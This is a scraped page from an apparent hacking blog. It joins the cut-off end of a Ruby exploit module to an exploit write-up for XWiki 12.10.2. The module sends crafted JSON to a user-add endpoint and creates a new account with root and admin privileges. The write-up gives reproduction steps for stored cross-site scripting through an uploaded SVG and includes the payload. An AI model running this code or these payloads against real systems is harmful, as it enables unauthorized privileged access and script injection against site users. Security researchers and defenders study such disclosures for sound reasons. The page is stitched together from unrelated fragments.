"/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}' res = send_request_raw({ 'method' => 'POST', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'), 'cookie' => cookie, 'data' => json_data }) if res.code == 200 and res.body.include? '"SUCCESS"' print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.") print_good("Username : #{datastore["USERNAME"]}") print_good("Password : #{datastore["PASSWORD"]}") break end end end end
  25. HireHackking

    Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Xwiki CMS 12.10.2 - Cross Site Scripting (XSS) # Date: 17-01-2021 # Exploit Author: Karan Keswani # Vendor Homepage: https://www.xwiki.org/xwiki/bin/view/Main/WebHome # Software Link: https://www.xwiki.org/xwiki/bin/view/Download/ # Version: Xwiki CMS- 12.10.2 # Tested on: Windows 10 # Description: XWiki 12.10.2 allows XSS via an SVG document to the upload feature of the comment section. # Additional Information: Well I found this vulnerability in Xwiki project based websites but they did not respond so i installed a latest version of Xwiki CMS and hosted on localhost with help of Wamp and then i exploited that vulnerability. # Attack Vector: 1) Create 2 accounts:- 1)Victim & 2)Attacker 2) Login with victim account, there is a option to create new dashboard and there is page says give title and type.( Type of Dashboard:-I created simple page) 3) Now save view the page, 4) Now login with attacker account and search and open the dashboard which has been created by victim, 5) When you open the dashboard there is a comment section option, Go to that comment section & add a comment,there is a upload functionality, 6) So i tried to upload a sample svg file to check that it will allow to upload .svg format 7) Now i created a text file with XSS payload and then saved it as a .svg format 8) Upload your .svg file and click on send it to the server and click ok (your comment will be add) 9) Now open that comment with the victim account and click on that view image you'll see the xss pop-up. Xss Payload:- <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <svg onload="alert('xss')" xmlns="http://www.w3.org/2000/svg"> </svg>